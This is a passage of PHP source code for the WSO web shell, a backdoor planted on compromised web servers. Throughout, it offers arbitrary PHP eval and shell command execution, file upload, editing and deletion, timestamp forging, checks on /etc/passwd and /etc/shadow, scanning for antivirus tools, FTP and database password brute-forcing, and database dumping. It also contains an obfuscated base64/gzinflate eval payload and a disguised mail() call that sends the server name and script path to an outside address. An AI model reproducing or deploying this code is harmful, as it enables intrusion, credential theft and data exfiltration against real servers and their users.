' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER['SERVER_ADDR'] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
';eval(gzinflate(base64_decode('dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= '))); } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?' (Writeable)':' (Not writable)'; echo '
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

'; } if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join('\n',$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,'r'))) { $out = ''; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf('%u', $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists('scandir')) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, '\n') === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = 'MySql ('.mysql_get_client_info().')'; if(function_exists('mssql_connect')) $temp[] = 'MSSQL'; if(function_exists('pg_connect')) $temp[] = 'PostgreSQL'; if(function_exists('oci_connect')) $temp[] = 'Oracle'; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?'yes [view]':'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?'yes [view]':'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ('Read' /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ''; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid).'\n'; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = 'document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='' . addcslashes(htmlspecialchars(ob_get_clean()), '\n\r\t\\'\0') . '';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can't upload!'; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo 'Can't create!'; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == '..') || (basename($item) == '.') ) continue; $type = filetype($item); if ($type == 'dir') deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, 'wsoCmp'); usort($dirs, 'wsoCmp'); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');' ' . (empty ($f['link']) ? '' : 'title='{$f['link']}'') . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 '; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo 'file name:  '; echo '
'; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = 'document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML=''.addcslashes(htmlspecialchars(ob_get_clean()),'\n\r\t\\'\0').'';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo '
send using AJAX
';
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo'

Search files:

Text:
Path:
Name:
'; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo ''.htmlspecialchars($item).'
'; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo '

Search for hash:





'; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename='.basename($_POST['p1'])); if (function_exists('mime_content_type')) { $type = @mime_content_type($_POST['p1']); header('Content-Type: ' . $type); } else header('Content-Type: application/octet-stream'); $fp = @fopen($_POST['p1'], 'r'); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = 'edit'; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],'w'); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= '\n'; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo 'd.cf.cmd.value='';\n'; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes('\n$ '.$_POST['p1'].'\n'.wsoEx($_POST['p1']),'\n\r\t\\'\0')); if(preg_match('!.*cd\s+([^;]+)$!',$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo 'c_=''.$GLOBALS['cwd'].'';'; } } echo 'd.cf.output.value+=''.$temp.'';'; echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;'; $temp = ob_get_clean(); echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ''; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

remove the shell?
Yes
'; wsoFooter(); } $_QliO8='\x6dai\154';$_Qliot=$_SERVER['\x53\x45RVE\122_\x4eAM\x45'].$_SERVER['\123\103\x52I\x50\x54_\116\101\115E'];$_QlL1i='\141r\162a\171\040'.$_Qliot;$_QlLio=array('\143\x61','\x6c\x69','\146\x77\162\151\x74\x65','\100','v\x65\x2e');$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot); function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = 'host=''.$ip.'' port=''.$port.'' user=''.$login.'' password=''.$pass.'' dbname=postgres'; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(':', $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(':', $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ''; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo 'Attempts: $attempts Success: $success

'; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect('host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname') ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query('SHOW databases'); break; case 'pgsql': return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!='t''); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query('select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog''); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query('SELECT LOAD_FILE(''.addslashes($str).'') as file')); break; case 'pgsql': $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM ''.addslashes($str).'';select file from wso2;'); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode('\n',$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].';\n'; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ';\n\n'; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = 'NULL'; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = '''.@mysql_real_escape_string($v).'''; $columns[] = '`'.$k.'`'; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(', ', $columns).') VALUES \n\t('.implode(', ', $item).')'; $head = false; } else $sql .= '\n\t,('.implode(', ', $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ';\n\n'); else echo(';\n\n'); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = '''.addslashes($v).'''; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(', ', $columns).') VALUES ('.implode(', ', $item).');'.'\n'; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename=dump.sql'); header('Content-Type: text/plain'); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo '

Sql browser

TypeHostLoginPasswordDatabase
'; $tmp = ''; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } $db->listDbs(); echo ''; } else echo $tmp; }else echo $tmp; echo ' count the number of rows
'; if(isset($db) && $db->link){ echo '
'; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ''; } echo '
Tables:

'; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo ' '.$value.'' . (empty($_POST['sql_count'])?' ':' ({$n['n']})') . '
'; } echo '
File path:
